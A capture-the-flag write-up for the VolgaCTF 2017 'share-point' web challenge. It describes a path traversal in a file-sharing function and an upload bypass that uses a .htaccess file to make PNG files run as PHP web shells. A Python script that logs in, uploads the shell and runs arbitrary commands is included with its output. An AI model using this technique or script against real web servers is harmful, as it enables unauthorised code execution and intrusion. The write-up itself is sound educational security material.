Descriptions:
Look! I wrote a good service for sharing your files with your friends, enjoy)Solution:
1. Access to target and found login page, After login will appear Upload, Files and Share functions.
Upload - Upload file.
Files - List of files upload.
Share - Share file upload to anothers user.
2. Try to upload PHP file, It not complete.
3. Try to upload PNG image file and upload complete.
4. I perform test a share function to share meme.png to another user.
5. Using Burp Suite to intercept request, in parameter filename is have vulnerable to Path Traversal, I can share ../../index.php to another user, and go to another user to read php file.
6. In another user. I perform download index.php to my folder.
Structure of folder: http://share-point.quals.2017.volgactf.ru/files/<username>/<file upload>
7. List of file.
8. But when I access to index.php, It return 500 Internal Server Error, Not work :(
9. I think several minute and try to use .htaccess to process file ending with .png as .php!
AddType application/x-httpd-php .png
10. Upload .htaccess and shell.png, in shell.png contain php code is a simple web shell that use system function.
12. Find a Flag, use command find / -name "*flag*"
13. cat /opt/flag.txt
My Automate Script:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Author: Kitwipat Towattana | |
| import requests, sys | |
| cmd = sys.argv[1] | |
| s = requests.Session() | |
| username = 'administrator' | |
| password = 'administrator' | |
| htaccess = '.htaccess' | |
| png_shell = 'shell.png' | |
| url_login = 'http://share-point.quals.2017.volgactf.ru/' | |
| url_upload = 'http://share-point.quals.2017.volgactf.ru/upload.php' | |
| url_file = 'http://share-point.quals.2017.volgactf.ru/files/{0}/{1}'.format(username,png_shell) | |
| def login(username, password): | |
| data = {"username":username,"password":password} | |
| resp = s.post(url_login, data=data).content | |
| return resp | |
| def upload(file): | |
| resp = s.post(url_upload, files={'userFile': open(file,'rb')}).content | |
| return resp | |
| def shell(url_file, cmd): | |
| resp = s.get(url_file+'?cmd={0}'.format(cmd)).content | |
| return resp | |
| print "[+] Stage 1 Login: {0}".format(login(username,password)) | |
| print "[+] Stage 2 Upload .htaccess: {0}".format(upload(htaccess)) | |
| print "[+] Stage 3 Upload PNG Shell: {0}".format(upload(png_shell)) | |
| print "[+] Command Output: \r\n{0}".format(shell(url_file,cmd)) | |
| ''' | |
| >python web200.py "cat /opt/flag.txt" | |
| [+] Stage 1 Login: success | |
| [+] Stage 2 Upload .htaccess: 1 | |
| [+] Stage 3 Upload PNG Shell: 1 | |
| [+] Command Output: | |
| VolgaCTF{AnoTHer_apPro0Ach_to_file_Upl0Ad_with_PhP} | |
| ''' |
Flag: VolgaCTF{AnoTHer_apPro0Ach_to_file_Upl0Ad_with_PhP}
http://thaitechnews.com
ตอบลบ